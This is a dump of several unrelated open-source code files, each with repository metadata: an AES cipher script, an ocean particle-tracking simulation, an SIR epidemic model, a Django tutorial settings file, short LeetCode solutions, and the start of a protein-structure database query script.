0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 0xe0, 0x32, 0x3a, 0x0a, 0x49,
0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4,
0xea, 0x65, 0x7a, 0xae, 0x08, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6,
0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70,
0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9,
0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e,
0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1,
0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0,
0x54, 0xbb, 0x16]
# Rijndael Inverted S-box
rsbox = [ 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3,
0x9e, 0x81, 0xf3, 0xd7, 0xfb , 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f,
0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb , 0x54,
0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b,
0x42, 0xfa, 0xc3, 0x4e , 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24,
0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25 , 0x72, 0xf8,
0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d,
0x65, 0xb6, 0x92 , 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda,
0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84 , 0x90, 0xd8, 0xab,
0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3,
0x45, 0x06 , 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1,
0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b , 0x3a, 0x91, 0x11, 0x41,
0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6,
0x73 , 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9,
0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e , 0x47, 0xf1, 0x1a, 0x71, 0x1d,
0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b ,
0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0,
0xfe, 0x78, 0xcd, 0x5a, 0xf4 , 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07,
0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f , 0x60,
0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f,
0x93, 0xc9, 0x9c, 0xef , 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5,
0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61 , 0x17, 0x2b,
0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55,
0x21, 0x0c, 0x7d]
#plaintext = raw_input("Enter your plaintext: ")
#plaintext=plaintext.upper()
#print "Enter your key of size ", len(plaintext), " or less: "
#key = raw_input()
#key = key.upper()
f = open(sys.argv[1])
message = f.read()
key_expansion()
message = encryption(message)
sys.stdout.write(message)
print
message = decryption(message)
sys.stdout.write(message)
print
| 36.531335
| 314
| 0.673007
|
68866faffe4c28071acc722f7eadca5bd37114b7
| 7,815
|
py
|
Python
|
ACC_particle_experiments/scripts_tracer_release/trelease_coarse_Markov1_K15000.py
|
daanreijnders/isoneutral-dispersion
|
88259ba658d15611609f52e1615aff37a54e7289
|
[
"MIT"
] | 1
|
2022-03-18T08:47:41.000Z
|
2022-03-18T08:47:41.000Z
|
ACC_particle_experiments/scripts_tracer_release/trelease_coarse_Markov1_K15000.py
|
daanreijnders/isoneutral-dispersion
|
88259ba658d15611609f52e1615aff37a54e7289
|
[
"MIT"
] | null | null | null |
ACC_particle_experiments/scripts_tracer_release/trelease_coarse_Markov1_K15000.py
|
daanreijnders/isoneutral-dispersion
|
88259ba658d15611609f52e1615aff37a54e7289
|
[
"MIT"
] | 1
|
2022-03-18T08:47:42.000Z
|
2022-03-18T08:47:42.000Z
|
import importlib
import sys
from datetime import timedelta as delta
import numpy as np
import parcels
import xarray as xr
sys.path.append("/nethome/4302001/diffusion-hydro-mod/kernels")
import density_elements_sampled
import Le_Sommer_elements
import EM_3D_BC
import M1_3D_BC
import K_Le_Sommer
import K_Redi_smallslope
import Markov1_3D_BC_taper
import Markov1_3D_BC_taper_init
nparts = 100_000
dt = 40*60 # seconds
Tl = 20*24*60*60
kappa = 15000
nusquared = kappa / Tl
eps = dt/Tl #
eta = 1e-5
# Random seed for reproducibility
parcels.rng.seed(1636)
inpath = "/data/oceanparcels/input_data/MITgcm/ACC_channel/"
refTracer = "ACC_ridge_fine_2y_loca.nc"
dataFile = "ACC_ridge_coarse_1y_locb_fixtemp_with_derivative.nc"
outFile = f"trelease_coarse_locb_Markov1_K{kappa}_Tl{Tl}_p{nparts}_dt{int(dt//60)}m.nc"
outPath = "/scratch/daanr/trajectories/ptracer/"
ds = xr.open_dataset(inpath + dataFile)
ds_ref = xr.open_dataset(inpath + refTracer)
def initializeParticles(reference_ds, level, nparts=50_000):
"""
Initializes particles in a similar distribution as the initial tracer distribution.
`nparts` is initial approximation. Actual number of particles used depends on initial
tracer distribution
Still a work in progress. To change:
- ability to specify (X, Y) center of release
- custom domains, independent from reference dataset
Returns
-------
tuple of 3 arrays
Arrays describing initial X, Y, Z coordinates
"""
nx = 200 # number of gridpoints in x-direction - 1000km/5km
ny = 400 # number of gridpoints in y-direction - 2000km/5km
nz = 30 # number of vertical levels
SALT_3D = np.zeros((nz, ny, nx))
X_release = int(reference_ds.XC[50].data)
Y_release = int(reference_ds.YC[200].data)
XX, YY = np.meshgrid(reference_ds.XC.data, reference_ds.YC.data)
dist_to_release = np.sqrt(np.square(X_release - XX) + np.square(Y_release - YY))
SALT_3D[level, :, :] = np.where(
dist_to_release / 50000 <= 1,
(1 / np.power(2 * np.exp(1), dist_to_release / 50000) - 1 / (2 * np.exp(1)))
/ (1 - 1 / (2 * np.exp(1))),
0,
)
totalTracer = np.sum(SALT_3D[level, :, :])
particlesPerUnitTracer = nparts / totalTracer
particlesPerBin = np.ceil(particlesPerUnitTracer * SALT_3D[level, :, :]).astype("int")
actualNParticles = np.sum(particlesPerBin)
lon = np.array([])
lat = np.array([])
depth = np.ones(actualNParticles) * reference_ds.Z.data[level]
coord_pairs = np.vstack(
(XX[dist_to_release < 50_000], YY[dist_to_release < 50_000])
)
particlesPerBin_masked = particlesPerBin[dist_to_release < 50_000]
# Random initialization of particles in each bin
for idx in range(particlesPerBin_masked.shape[0]):
lon = np.append(
lon,
np.random.uniform(
coord_pairs[0, idx] - 2500,
coord_pairs[0, idx] + 2500,
particlesPerBin_masked[idx],
),
)
lat = np.append(
lat,
np.random.uniform(
coord_pairs[1, idx] - 2500,
coord_pairs[1, idx] + 2500,
particlesPerBin_masked[idx],
),
)
return np.array(lon), np.array(lat), depth
#
plon, plat, pdepth = initializeParticles(ds_ref, 24, nparts=nparts)
ds_ref.close()
def create_fieldset(inpath, dataFile, derivatives= False, Le_Sommer=False):
filenames = {
"U": inpath + dataFile,
"V": inpath + dataFile,
"W": inpath + dataFile,
"THETA": inpath + dataFile,
"boundaryMask": inpath + dataFile,
}
variables = {"U": "UVEL",
"V": "VVEL",
"W": "WVEL",
"THETA": "THETA",
"boundaryMask" : "boundaryMask",
}
dimensions = {
"U": {"lon": "XG", "lat": "YG", "depth": "Zl", "time": "time"},
"V": {"lon": "XG", "lat": "YG", "depth": "Zl", "time": "time"},
"W": {"lon": "XG", "lat": "YG", "depth": "Zl", "time": "time"},
"THETA": {"lon": "XC", "lat": "YC", "depth": "Z", "time": "time"},
"boundaryMask": {"lon": "XC", "lat": "YC", "depth": "Z"},
}
if derivatives == True:
for derivdim in ['X', 'Y', 'Z', 'XX', 'XY', 'XZ', 'YY', 'YZ', 'ZZ']:
filenames[f"dRhod{derivdim}"] = inpath + dataFile
variables[f"dRhod{derivdim}"] = f"dTHETAd{derivdim}"
dimensions[f"dRhod{derivdim}"] = dict(zip(["time", "depth", "lat", "lon"], ds[f"dTHETAd{derivdim}"].dims))
if Le_Sommer == True:
for var in ['Delta', 'P', 'Q', 'R']:
filenames[var] = inpath + dataFile
variables[var] = var.lower()
dimensions[var] = dict(zip(["time", "depth", "lat", "lon"], ds[var.lower()].dims))
for derivdim in ['X', 'Y', 'Z']:
filenames[f"d{var}d{derivdim}"] = inpath + dataFile
variables[f"d{var}d{derivdim}"] = f"d{var.lower()}d{derivdim}"
dimensions[f"d{var}d{derivdim}"] = dict(zip(["time", "depth", "lat", "lon"], ds[f"d{var.lower()}d{derivdim}"].dims))
fieldset = parcels.FieldSet.from_c_grid_dataset(filenames, variables, dimensions, mesh="flat", tracer_interp_method='linear', gridindexingtype='mitgcm', deferred_load=False)
fieldset.add_periodic_halo(zonal=True, meridional=True)
fieldset.add_constant("expansion_terms", 10)
fieldset.add_constant("domain_width", 1_000_000)
fieldset.add_constant("northBound", 2_000_000)
fieldset.add_constant("southBound", 50_000)
fieldset.add_constant("upperBound", -10)
fieldset.add_constant("lowerBound", -3907.58)
fieldset.add_constant("Sc", 0.008)
fieldset.add_constant("Sd", 0.0005)
fieldset.add_constant("TL", Tl)
fieldset.add_constant("nusquared", nusquared)
fieldset.add_constant("epsilon", eps)
fieldset.add_constant("etaval", eta)
return fieldset
fieldset = create_fieldset(inpath, dataFile, derivatives=True, Le_Sommer=False)
class MyParticle(parcels.JITParticle):
pot_temp = parcels.Variable('pot_temp', initial=0)
lon_adjustment = parcels.Variable('lon_adjustment', initial=0)
u_prime = parcels.Variable('u_prime', initial=0)
v_prime = parcels.Variable('v_prime', initial=0)
w_prime = parcels.Variable('w_prime', initial=0)
pset = parcels.ParticleSet.from_list(fieldset=fieldset, pclass=MyParticle, lon=plon, lat=plat, depth=pdepth)
def SampleTHETA(particle, fieldset, time):
particle.pot_temp = fieldset.THETA[time, particle.depth, particle.lat, particle.lon]
SampleTHETAKernel = pset.Kernel(SampleTHETA)
pset.execute(SampleTHETAKernel + \
density_elements_sampled.density_elements_sampled + \
Markov1_3D_BC_taper_init.Markov1_3D_BC_taper_init,
dt=0)
def periodicBC(particle, fieldset, time):
if particle.lon < 0:
particle.lon += fieldset.domain_width
particle.lon_adjustment -= fieldset.domain_width
elif particle.lon > fieldset.domain_width:
particle.lon -= fieldset.domain_width
particle.lon_adjustment += fieldset.domain_width
def deleteParticle(particle, fieldset, time):
particle.delete()
output_file = pset.ParticleFile(
name=outPath+outFile, outputdt=delta(hours=24)
)
pset.execute(
pset.Kernel(density_elements_sampled.density_elements_sampled) \
+ pset.Kernel(Markov1_3D_BC_taper.Markov1_3D_BC_taper)
+ pset.Kernel(periodicBC) \
+ SampleTHETAKernel,
runtime=delta(days=180),
dt=delta(seconds=dt),
output_file=output_file,
recovery={ErrorCode.ErrorInterpolation: deleteParticle,
ErrorCode.ErrorOutOfBounds: deleteParticle}
)
output_file.close()
| 36.180556
| 177
| 0.642099
|
69accde6c5fc777d0db211af009870b0afd656ff
| 16,400
|
py
|
Python
|
code/sir_model.py
|
oskali/mit_cassandra
|
522460c29a9bfb6fe16ff85775f52d78d5372233
|
[
"MIT"
] | null | null | null |
code/sir_model.py
|
oskali/mit_cassandra
|
522460c29a9bfb6fe16ff85775f52d78d5372233
|
[
"MIT"
] | null | null | null |
code/sir_model.py
|
oskali/mit_cassandra
|
522460c29a9bfb6fe16ff85775f52d78d5372233
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 24 15:01:53 2020
@author: leann, omars
"""
#%% Libraries
import numpy as np
from scipy.integrate import odeint as ode
import pandas as pd
from copy import deepcopy
import scipy.optimize as optimize
from datetime import timedelta
from sklearn.metrics import mean_squared_error
from math import sqrt
from tqdm import tqdm
#%% Helper Functions
def mob_func(t, b1, b2, p, T):
x = b2 - b1
y = 1 + (p**(-t + T))
return (x/y) + b1
#ode differential equations
def model(ini, time_step, params):
Y = np.zeros(5) #column vector for the state variables
X = ini
beta1 = params[0]
gamma = params[1]
a = params[3]
mu = params[4]
beta2 = params[5]
p = params[6]
T = params[7]
S = X[0]
E = X[1]
I = X[2]
R = X[3]
D = X[4]
Y[0] = 0 - (mob_func(time_step, beta1, beta2, p, T)*S*I)/params[2] #S
Y[1] = (mob_func(time_step, beta1, beta2, p, T)*S*I)/params[2] - a*E #E
Y[2] = a*E - (gamma + mu)*I #I
Y[3] = gamma*I #R
Y[4] = mu*I #D
return Y
#set up initial compartments
def inifcn(params, cases, deaths):
S0 = params[2] - cases[0] - deaths[0]
E0 = 0.0
I0 = cases[0]
R0 = 0.0
D0 = deaths[0]
X0 = [S0, E0, I0, R0, D0]
return X0
#retrieve cumlative case compartments (active, recovered, dead)
def finfcn(res):
return res[:,2], res[:,3], res[:,4]
#objective function to optimize hyperparameters
def NLL(params, cases, deaths, recover, death_lm, recover_lm, weight_dead, weight_recover, times): #loss function
params = np.abs(params)
cases = np.array(cases)
deaths = np.array(deaths)
res = ode(model, inifcn(params,cases,deaths), times, args =(params,))
active, recovered, dead = finfcn(res)
nll = sqrt(mean_squared_error(cases,active)) + death_lm*sqrt(mean_squared_error(deaths,dead)) + recover_lm*sqrt(mean_squared_error(recover,recovered))
return nll
#%% Model
class SIRModel():
def __init__(self,
nmin=100,
date='date',
region='state',
target='cases',
population='population',
optimizer='Nelder-Mead',
beta1vals = [],
beta2vals = [],
gammavals = [0.01],
avals = [0.0714],#0.142
muvals = [0.001],
pvals = [5],
Tvals = [40, 72],
# beta1vals = [0.01, 0.2, 1],
# beta2vals = [0.05, 2.25, 4.5],
train_valid_split = 0.8,
nmin_train_set = 10,
death_lm = 2,
recover_lm = 2,
verbose = True):
self.nmin = nmin
self.date = date
self.region = region
self.target = target
self.population = population
self.optimizer = optimizer
self.beta1vals = beta1vals
self.beta2vals = beta2vals
self.gammavals = gammavals
self.avals = avals
self.muvals = muvals
self.pvals = pvals
self.Tvals = Tvals
self.nmin_train_set = nmin_train_set
self.train_valid_split = train_valid_split
self.death_lm = death_lm
self.recover_lm = recover_lm
self.verbose = verbose
self.trained_warmstart = None
self.trained_param = None
def fit(self,
df,
retrain_warmstart = False):
dataset = deepcopy(df)
dataset.set_index([self.date])
regions = dataset[self.region].unique()
output = dict()
warmstart = dict()
population_df = dataset.loc[:, [self.region, self.population]]
population = {population_df.iloc[i, 0] : population_df.iloc[i, 1] for i in range(population_df.shape[0])}
for i in range(len(regions)):
region = regions[i]
train_full_set = dataset[[a for a in dataset[self.region] == region]]
train_full_set = train_full_set.sort_values(self.date)
train_full_set['active'] = train_full_set['cases'] - train_full_set['cases'].shift(14)
train_full_set = train_full_set.dropna(subset=['active'])
train_full_set = train_full_set[[a for a in train_full_set["active"] > self.nmin]]
#for counties
region_pop = population[region]
if train_full_set.shape[0] > self.nmin_train_set and region_pop > 0:
train_full_set = train_full_set.sort_values(self.date)
# if self.region == 'fips':
# try:
# list_1 = []
# for i in range(len(train_full_set)):
# val_1 = train_full_set['active'].values[i]
# val_2 = ((train_full_set['cases'].values[i])*val_1)/train_full_set['cases_state_state'].values[i]
# list_1.append(val_2)
# train_full_set['active'] = list_1
# except:
# pass
full_times = [j for j in range(len(train_full_set))]
full_cases = train_full_set.loc[:, "active"].values
full_dead = train_full_set.loc[:, "deaths"].values
full_recover = train_full_set.loc[:, "cases"].values - train_full_set.loc[:, "active"].values - train_full_set.loc[:, "deaths"].values
train_set, valid_set= np.split(train_full_set, [int(self.train_valid_split *len(train_full_set))])
timer = [j for j in range(len(train_set))]
train_cases = train_set.loc[:, "active"].values
train_cum_cases = train_set.loc[:, "cases"].values
train_dead = train_set.loc[:, "deaths"].values
train_recover = train_set.loc[:, "cases"].values - train_set.loc[:, "active"].values - train_set.loc[:, "deaths"].values
times = timer
valid_times = [j for j in range(len(valid_set))]
valid_cases = valid_set.loc[:, "active"].values
valid_dead = valid_set.loc[:, "deaths"].values
valid_recover = valid_set.loc[:, "cases"].values - valid_set.loc[:, "active"].values - valid_set.loc[:, "deaths"].values
region_pop = population[region]
if sum(train_dead)/sum(train_cases) > 0.01:
weight_dead = sum(train_cases)/sum(train_dead)
else:
weight_dead = 10
if sum(train_recover)/sum(train_cases) > 0.01:
weight_recover = sum(train_cases)/sum(train_recover)
else:
weight_recover = 10
if self.trained_warmstart == None or retrain_warmstart == True:
i_t = train_cum_cases[1:(len(train_cum_cases)-1)] - train_cum_cases[0:(len(train_cum_cases)-2)]
r_t = train_recover[1:(len(train_recover)-1)] - train_recover[0:(len(train_recover)-2)]
d_t = train_dead[1:(len(train_dead)-1)] - train_dead[0:(len(train_dead)-2)]
S_t = np.array(region_pop) - train_cum_cases
#print(i_t)
beta = sum(i_t)/sum(train_cases*S_t/region_pop)
gamma = sum(r_t)/sum(train_cases)
mu = sum(d_t)/sum(train_cases)
region_beta1vals = self.beta1vals.copy()
#region_gammavals = self.gammavals
region_avals = self.avals.copy()
#region_muvals = self.muvals
region_beta2vals = self.beta2vals.copy()
region_pvals = self.pvals.copy()
region_Tvals = self.Tvals.copy()
region_gammavals = [gamma]
region_muvals = [mu]
region_beta1vals.append(beta)
region_beta2vals.append(beta)
#region_gammavals.append(gamma)
#region_muvals.append(mu)
param_list = []
mse_list = []
if self.verbose:
iteration = len(region_beta1vals)*len(region_beta2vals)*len(region_gammavals)*len(region_avals)*len(region_muvals)*len(region_pvals)*len(region_Tvals)
progress_bar = tqdm(range(iteration), desc = str(region))
beta1_progress = range(len(region_beta1vals))
gamma_progress = range(len(region_gammavals))
a_progress = range(len(region_avals))
mu_progress = range(len(region_muvals))
beta2_progress = range(len(region_beta2vals))
p_progress = range(len(region_pvals))
T_progress = range(len(region_Tvals))
for beta1index in beta1_progress:
for gammaindex in gamma_progress:
for aindex in a_progress:
for muindex in mu_progress:
for beta2index in beta2_progress:
for pindex in p_progress:
for Tindex in T_progress:
if self.verbose:
progress_bar.update(1)
params = [region_beta1vals[beta1index], region_gammavals[gammaindex], region_pop, region_avals[aindex], region_muvals[muindex], region_beta2vals[beta2index], region_pvals[pindex], region_Tvals[Tindex]]
optimizer = optimize.minimize(NLL, params, args=(train_cases, train_dead, train_recover, self.death_lm, self.recover_lm, weight_dead, weight_recover, times), method=self.optimizer)
params = np.abs(optimizer.x)
ini = inifcn(params, train_cases, train_dead)
param_list.append([region_beta1vals[beta1index],region_gammavals[gammaindex],region_avals[aindex],region_muvals[muindex], region_beta2vals[beta2index], region_pvals[pindex], region_Tvals[Tindex]])
train_est = ode(model, ini, times, args=(params,))
valid_ini = train_est[len(train_est)-1,:]
valid_est = ode(model, valid_ini, valid_times, args=(params,))
active, recovered, dead = finfcn(valid_est)
mse = sqrt(mean_squared_error(valid_cases,active)) + self.death_lm*sqrt(mean_squared_error(valid_dead,dead)) + self.recover_lm*sqrt(mean_squared_error(valid_recover,recovered))
mse_list.append(mse)
minindex = mse_list.index(min(mse_list))
beta1 = param_list[minindex][0]
gamma = param_list[minindex][1]
a = param_list[minindex][2]
mu = param_list[minindex][3]
beta2 = param_list[minindex][4]
p = param_list[minindex][5]
T = param_list[minindex][6]
params = [beta1, gamma, region_pop, a, mu, beta2, p, T]
paramnames = ['beta1', 'gamma', 'pop', 'a', 'mu', 'beta2', 'p', 'T']
warmstart[region] = params
else:
params = self.trained_warmstart[region]
optimizer = optimize.minimize(NLL, params, args=(full_cases, full_dead, full_recover, self.death_lm, self.recover_lm, weight_dead, weight_recover, full_times), method=self.optimizer)
paramests = np.abs(optimizer.x)
iniests = inifcn(paramests, full_cases, full_dead)
xest = ode(model, iniests, full_times, args=(paramests,))
output[region] = [paramests, xest[0,:], xest[len(xest)-1,:], train_full_set.date.iloc[0], train_full_set.date.iloc[len(train_full_set) - 1]]
self.trained_param = output
self.trained_warmstart = warmstart
def predict(self,
regions,
dates):
results = dict()
for i in range(len(regions)):
region = regions[i]
try:
region_params = self.trained_param[region]
except KeyError:
continue
params = region_params[0]
#print(params)
start_vals = region_params[1]
end_vals = region_params[2]
start_date = region_params[3]
end_date = region_params[4]
insample_dates = []
outsample_dates = []
for d in dates:
if d >= start_date and d <= end_date:
insample_dates.append(d)
elif d >= end_date:
outsample_dates.append(d)
# Calculate training preds
train_pred = pd.DataFrame()
train_dates = pd.DataFrame()
if len(insample_dates) > 0:
tDelta = end_date - start_date
times = [k for k in range(tDelta.days)]
ini = start_vals
paramests = params
res = ode(model, ini, times, args=(paramests,))
active, recovered, dead = finfcn(res)
if self.target == "cases":
train_pred = active + recovered + dead
elif self.target == "active":
train_pred = active
elif self.target == "deaths":
train_pred = dead
train_dates = [start_date + timedelta(days=x) for x in range(tDelta.days)]
# Calculate testing preds
test_pred = pd.DataFrame()
test_dates = pd.DataFrame()
last_date = max(dates)
tDelta = last_date - end_date
times = [k for k in range(tDelta.days + 1)]
ini1 = end_vals
# Simulate the model
res = ode(model, ini1, times, args=(params,))
active, recovered, dead = finfcn(res)
if self.target == "cases":
test_pred = active + recovered + dead
elif self.target == "active":
test_pred = active
elif self.target == "deaths":
test_pred = dead
test_dates = [end_date + timedelta(days=x) for x in range(tDelta.days + 1)]
if len(outsample_dates) > 0 and len(insample_dates) > 0:
df_fin = pd.DataFrame(np.concatenate((train_pred, test_pred)), index=np.concatenate((train_dates, test_dates)))
elif len(insample_dates) > 0:
df_fin = pd.DataFrame(train_pred, index=train_dates)
else:
df_fin = pd.DataFrame(test_pred, index=test_dates)
results[region] = df_fin.loc[list(np.array(dates)[[date >= start_date for date in dates]]), 0]
return results
| 45.555556
| 253
| 0.495915
|
a78874d1ef795e48f6fa3fc68c594272f2526cb1
| 3,317
|
py
|
Python
|
DRF Doc/PastebinAPI/start_project/settings.py
|
ibnshayed/Python-Programming
|
a5c50b7ced5131b25260f4c3401f98d016ea8355
|
[
"MIT"
] | null | null | null |
DRF Doc/PastebinAPI/start_project/settings.py
|
ibnshayed/Python-Programming
|
a5c50b7ced5131b25260f4c3401f98d016ea8355
|
[
"MIT"
] | null | null | null |
DRF Doc/PastebinAPI/start_project/settings.py
|
ibnshayed/Python-Programming
|
a5c50b7ced5131b25260f4c3401f98d016ea8355
|
[
"MIT"
] | null | null | null |
"""
Django settings for start_project project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@19g14ap4cj$ng7+7c#!0^ps@%=*957y=ru!%*_6by-#((7z4_'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# 3rd party
'rest_framework',
# local
'snippets.apps.SnippetsConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'start_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'start_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
}
| 25.128788
| 91
| 0.696412
|
71a5d310438f696ca0d9bfde5376ce1ceff33406
| 260
|
py
|
Python
|
array/max_product.py
|
elenaborisova/LeetCode-Solutions
|
98376aab7fd150a724e316357ae5ea46988d9eac
|
[
"MIT"
] | null | null | null |
array/max_product.py
|
elenaborisova/LeetCode-Solutions
|
98376aab7fd150a724e316357ae5ea46988d9eac
|
[
"MIT"
] | null | null | null |
array/max_product.py
|
elenaborisova/LeetCode-Solutions
|
98376aab7fd150a724e316357ae5ea46988d9eac
|
[
"MIT"
] | null | null | null |
def max_product(nums):
first_num = nums.pop(nums.index(max(nums)))
second_num = max(nums)
result = (first_num - 1) * (second_num - 1)
return result
print(max_product([3, 4, 5, 2]))
print(max_product([1, 5, 4, 5]))
print(max_product([3, 7]))
| 21.666667
| 47
| 0.630769
|
18e9b1d9c77f0ff1bac5307d4c6c9ada00b3705b
| 760
|
py
|
Python
|
Leetcode/Python/_231.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | 1
|
2021-11-28T15:03:32.000Z
|
2021-11-28T15:03:32.000Z
|
Leetcode/Python/_231.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
Leetcode/Python/_231.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
import math
class Solution:
def isPowerOfTwo(self, n: int) -> bool:
if n <= 0:
return False
base = math.floor(math.log(n, 2))
return 2**base == n
class Solution:
def isPowerOfTwo(self, n: int) -> bool:
power = 0
num = 2
if n == 1:
return True
elif n == 2:
return True
while num < n:
num *= 2
if num == n:
return True
return False
class Solution:
def isPowerOfTwo(self, n: int) -> bool:
cnt = 0
while n:
if n & 0x1:
cnt += 1
if cnt > 1:
return False
n >>= 1
if cnt == 1:
return True
| 21.111111
| 43
| 0.413158
|
9c45209bd12e975f43545c6e4b429ff7d6ce58e9
| 5,081
|
py
|
Python
|
ramachandran/download.py
|
leimao/Ramachandran
|
8080697cced0b33792493de8d784467734433ca5
|
[
"Apache-2.0"
] | 2
|
2021-02-15T07:11:26.000Z
|
2021-02-23T09:25:54.000Z
|
ramachandran/download.py
|
leimao/Ramachandran
|
8080697cced0b33792493de8d784467734433ca5
|
[
"Apache-2.0"
] | null | null | null |
ramachandran/download.py
|
leimao/Ramachandran
|
8080697cced0b33792493de8d784467734433ca5
|
[
"Apache-2.0"
] | null | null | null |
from typing import List
import os
import requests
import json
import asyncio
import aiohttp
import time
import tqdm
sem = asyncio.Semaphore(20)
def query_x_ray_entries(maximum_resolution: float = 1.5) -> List[str]:
# RCSB search API
# https://search.rcsb.org/redoc/index.html
# https://search.rcsb.org/index.html#search-api
pdb_ids = []
url = "https://search.rcsb.org/rcsbsearch/v1/query"
query = {
"query": {
"type":
"group",
"logical_operator":
"and",
"nodes": [{
"type": "terminal",
"service": "text"
}, {
"type":
"group",
"logical_operator":
"and",
"nodes": [
{
"type": "terminal",
"service": "text",
"parameters": {
"attribute": "exptl.method",
"operator": "exact_match",
"value": "X-RAY DIFFRACTION"
}
},
{
"type": "terminal",
"service": "text",
"parameters": {
"operator": "less_or_equal",
"value": maximum_resolution,
"attribute": "rcsb_entry_info.resolution_combined"
}
},
]
}]
},
"return_type": "entry",
"request_options": {
"return_all_hits": True
}
}
response = requests.post(url, data=json.dumps(query))
response.raise_for_status()
response_status = response.status_code
text_content = response.text
json_data = json.loads(text_content)
for result in json_data["result_set"]:
